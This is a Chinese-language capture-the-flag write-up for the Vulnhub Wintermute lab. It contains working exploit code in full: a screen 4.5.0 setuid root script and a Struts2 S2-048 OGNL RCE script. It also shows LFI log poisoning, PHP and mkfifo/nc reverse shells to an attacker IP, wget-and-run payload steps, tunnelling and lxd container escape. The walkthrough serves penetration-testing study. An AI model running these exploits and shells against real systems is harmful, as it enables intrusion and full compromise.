[Vulnhub]Wintermute LFI+SMTP+Screen+Structv2-RCE+Lxc逃逸

概要

靶机 192.168.8.104

信息收集

$ nmap 192.168.8.103 --min-rate 1000 -sC -sV

结果:

Starting Nmap 7.92 ( https://nmap.org ) at 2024-06-15 05:54 EDT
Nmap scan report for 192.168.8.103 (192.168.8.103)
Host is up (0.035s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE SERVICE         VERSION
25/tcp   open  smtp            Postfix smtpd
|_smtp-commands: straylight, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8
| ssl-cert: Subject: commonName=straylight
| Subject Alternative Name: DNS:straylight
| Not valid before: 2018-05-12T18:08:02
|_Not valid after:  2028-05-09T18:08:02
|_ssl-date: TLS randomness does not represent time
80/tcp   open  http            Apache httpd 2.4.25 ((Debian))
|_http-title: Night City
|_http-server-header: Apache/2.4.25 (Debian)
3000/tcp open  hadoop-datanode Apache Hadoop
| http-title: Welcome to ntopng
|_Requested resource was /lua/login.lua?referer=/
|_http-trane-info: Problem with XML parsing of /evox/about
| hadoop-tasktracker-info:
|_  Logs: submit
| hadoop-datanode-info:
|_  Logs: submit
Service Info: Host:  straylight

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.39 seconds

我们访问3000端口,发现存在一个ntopng服务

ntopng 是一个高性能的网络监控工具和流量分析平台。它提供了丰富的图形用户界面，用于实时监控网络流量和分析网络行为。ntopng 是 ntop 项目的升级版，具有更强的功能和更高的性能。

username:admin
password:admin

通过默认账密进入后台,发现在80端口还开放了一个目录turing-bolo

http://192.168.8.103//turing-bolo/

把图中三个文件拼接到url
molly.log
armitage.log
riviera.log

http://192.168.8.103//turing-bolo/bolo.php?bolo=molly.log

当我们删除.log后缀后

http://192.168.8.103//turing-bolo/bolo.php?bolo=molly

所以bolo.php会将传入的参数后缀加上.log再进行包含

根据Nmap扫描报告中,发现SMTP服务开启,那么在/var/log中必然存在一个mail.log的日志文件。

http://192.168.8.103//turing-bolo/bolo.php?bolo=/var/log/mail

$ nc -nC 192.168.8.103 25

http://192.168.8.103//turing-bolo/bolo.php?bolo=/var/log/mail

Get Shell

$ nc -lvnp 10032

http://192.168.8.103//turing-bolo/bolo.php?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%22192.168.8.107%22%2C10032%29%3Bexec%28%22%2Fbin%2Fbash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27&bolo=/var/log/mail

Local.txt 截屏

Local.txt 内容

dainowandiawd

权限提升

$ find / -perm -u=s -type f 2>null

我们搜索权限提升的利用脚本

$ searchsploit screen 4.5.0

#!/bin/bash
# screenroot.sh
# setuid screen v4.5.0 local root exploit
# abuses ld.so.preload overwriting to get root.
# bug: https://lists.gnu.org/archive/html/screen-devel/2017-01/msg00025.html
# HACK THE PLANET
# ~ infodox (25/1/2017)
echo "~ gnu/screenroot ~"
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we create our /etc/ld.so.preload file..."
cd /etc
umask 000 # because
screen -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so" # newline needed
echo "[+] Triggering..."
screen -ls # screen itself is setuid, so...
/tmp/rootshell

$ cd /tmp
$ wget http://192.168.8.107/root.sh
$ chmod +x root.sh
$ ./root.sh

Proot.txt 截屏

Proot.txt 内容

dainowandiawd

靶机 192.168.28.4

信息收集

在note.txt中发现了一段描述

Devs,

Lady 3Jane has asked us to create a custom java app on Neuromancer's primary server to help her interact w/ the AI via a web-based GUI.

The engineering team couldn't strss enough how risky that is, opening up a Super AI to remote access on the Freeside network. It is within out internal admin network, but still, it should be off the network completely. For the sake of humanity, user access should only be allowed via the physical console...who knows what this thing can do.

Anyways, we've deployed the war file on tomcat as ordered - located here:

/struts2_2.3.15.1-showcase

It's ready for the devs to customize to her liking...I'm stating the obvious, but make sure to secure this thing.

Regards,

Bob Laugh
Turing Systems Engineer II

管理员似乎添加了一个struts2_2.3.15.1,但似乎存在风险

通过arp发现局域网内还存在其他主机,所以我们需要横向

./chisel server -p 2333 --socks5

./chisel client 192.168.8.103:2333 socks

通过proxychais连接127.0.0.1:1080,这里你可以使用proxychains -h,来找到配置文件

进行扫描

$ proxychains -f ./internal.conf nmap 192.168.28.4 --min-rate 1000 -Pn

$ proxychains -f ./internal.conf nmap -p 8009,8080 192.168.28.4 -Pn -sC -sV

Get Shell

根据之前文档中提示,访问目录

$ searchsploit struts2

#!/usr/bin/python
# -*- coding: utf-8 -*-

# Just a demo for CVE-2017-9791


import requests


def exploit(url, cmd):
    print("[+] command: %s" % cmd)

    payload = "%{"
    payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
    payload += "(#_memberAccess?(#_memberAccess=#dm):"
    payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
    payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
    payload += "(#ognlUtil.getExcludedPackageNames().clear())."
    payload += "(#ognlUtil.getExcludedClasses().clear())."
    payload += "(#context.setMemberAccess(#dm))))."
    payload += "(@java.lang.Runtime@getRuntime().exec('%s'))" % cmd
    payload += "}"

    data = {
        "name": payload,
        "age": 20,
        "__checkbox_bustedBefore": "true",
        "description": 1
    }

    headers = {
        'Referer': 'http://127.0.0.1:8080/2.3.15.1-showcase/integration/editGangster'
    }
    requests.post(url, data=data, headers=headers)


if __name__ == '__main__':
    import sys

    if len(sys.argv) != 3:
        print("python %s <url> <cmd>" % sys.argv[0])
        sys.exit(0)

    print('[*] exploit Apache Struts2 S2-048')
    url = sys.argv[1]
    cmd = sys.argv[2]

    exploit(url, cmd)

    # $ ncat -v -l -p 4444 &
    # $ python exploit_S2-048.py http://127.0.0.1:8080/2.3.15.1-showcase/integration/saveGangster.action "ncat -e /bin/bash 127.0.0.1 4444"

首先我们要在主机B利用socat进行端口转发,在主机B本地监听10034端口,并且将数据转发至Kali机子192.168.8.107:10034

$ socat TCP-LISTEN:10034,fork,reuseaddr TCP:192.168.8.107:10034 &

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.28.3 10034 >/tmp/f

将以上命令保存至 re.sh

(Kali)$ python3 -m http.server 10034

(kali)$ proxychains -f internal.conf python3 exp.py http://192.168.28.4:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "wget http://192.168.28.3:10034/re.sh -O /tmp/re.sh"

(kali)$ nc -lvnp 10034

(kali)$ proxychains -f internal.conf python3 exp.py http://192.168.28.4:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "chmod +x /tmp/re.sh"

(kali)$ proxychains -f internal.conf python3 exp.py http://192.168.28.4:8080/struts2_2.3.15.1-showcase/integration/saveGangster.action "sh /tmp/re.sh"

Local.txt 截屏

Local.txt 内容

dwhai1d2

权限提升

由于该连接及其不稳定所以我们通过ssh进行连接

我们尝试在/home命令下,检测写入权限

ta@neuromancer:/home$ for dir in /home/*/; do touch "$dir/1.txt"; done

发现用户:ta可以创建文件

ta@neuromancer:/home$ ssh-keygen
ta@neuromancer:/home$ cat /home/ta/.ssh/id_rsa
ta@neuromancer:~/.ssh$ cat id_rsa.pub >authorized_keys

复制私钥保存到kali,文件名id_rsa

(kali)$ chmod 400 id_rsa

但是对方ssh服务开放在端口34483。

(kali)$ proxychains -f internal.conf ssh -i id_rsa ta@192.168.28.4 -p 34483

我们发现用户ta存在于lxd组,我们可以利用它进行提权

(kali)$ git clone https://github.com/saghul/lxd-alpine-builder.git

(kali)$ cd lxd-alpine-builder

构建包

(kali)$ sudo ./build-alpine

(192.168.8.103)$ socat TCP-LISTEN:10035,fork,reuseaddr TCP:192.168.8.107:10035 &

(kali)$ python3 -m http.server 10035

ta@neuromancer:/tmp$ wget http://192.168.28.3:10035/alpine-v3.20-x86_64-20240613_1112.tar.gz /tmp/alpine-v3.20-x86_64-20240613_1112.tar.gz

ta@neuromancer:/tmp$ lxc image import /tmp/alpine-v3.20-x86_64-20240613_1112.tar.gz --alias test

ta@neuromancer:/tmp$ lxc image list

ta@neuromancer:/tmp$ lxc init test ignite -c security.privileged=true

lxc init myimage ignite：初始化一个名为 ignite 的容器，基于 myimage 镜像。
-c security.privileged=true：配置容器为特权容器。这意味着容器中的进程将以 root 权限运行，并且可能直接访问宿主机的设备和文件系统。

ta@neuromancer:/tmp$ lxc config device add ignite test disk source=/ path=/mnt/root recursive=true

选择 /mnt/root 作为挂载点是为了确保挂载操作安全、明确和无冲突。通过这种方式，你能够在容器内方便地访问和操作宿主机的文件系统，从而实现提权操作。

lxc config device add ignite mydevice disk：向 ignite 容器添加一个名为 mydevice 的设备，类型为 disk。
source=/：指定宿主机的根目录 / 作为源目录。
path=/mnt/root：在容器内将该目录挂载到 /mnt/root。
recursive=true：递归挂载，包含子目录。

$ lxc start ignite

$ lxc exec ignite /bin/sh

成功逃逸